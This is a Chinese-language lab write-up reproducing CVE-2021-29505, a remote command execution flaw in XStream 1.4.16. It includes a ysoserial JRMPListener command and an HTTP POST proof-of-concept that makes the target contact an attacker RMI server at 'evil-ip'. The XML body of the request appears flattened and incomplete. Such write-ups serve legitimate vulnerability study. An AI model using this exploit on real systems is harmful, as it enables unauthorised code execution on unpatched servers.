# XStream 反序列化命令执行漏洞（CVE-2021-29505） XStream是一个轻量级、简单易用的开源Java类库，它主要用于将对象序列化成XML（JSON）或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞，但是其 1.4.16 及之前版本黑名单存在缺陷，攻击者可利用`sun.rmi.registry.RegistryImpl_Stub`构造RMI请求，进而执行任意命令。参考链接： - [https://x-stream.github.io/CVE-2021-29505.html][1] - https://paper.seebug.org/1543/ ## 漏洞环境执行如下命令启动一个Springboot + XStream 1.4.16的环境： ``` docker compose up -d ``` 环境启动后，我们向`http://your-ip:8080`发送一个正常的XML数据包，将会得到预期返回： ![](1.png) ## 漏洞复现作为攻击者，我们在自己的服务器上使用[ysoserial](https://github.com/frohoff/ysoserial)的JRMPListener启动一个恶意的RMI Registry： ``` java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "touch /tmp/success" ``` 这个RMI Registry在收到请求后，会返回用CommonsCollections6利用链构造的恶意序列化对象。然后，我们向目标服务器发送CVE-2021-29505的XML POC： ``` POST / HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/xml Content-Length: 3169

2 3

12345 com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content

12345 true SOAP_11 false aa aa UnicastRef evil-ip 1099 0 0 0 0 false evil-ip 1099

``` 其中，evil-ip是恶意RMI服务器的地址。恶意RMI服务器收到RMI请求： ![](2.png) 进入目标容器内，可见``touch /tmp/success``已成功执行： ![](3.png) 值得注意的是，我们没有直接使用[官网][1]给出的POC，那个POC是错的。 [1]: https://x-stream.github.io/CVE-2021-29505.html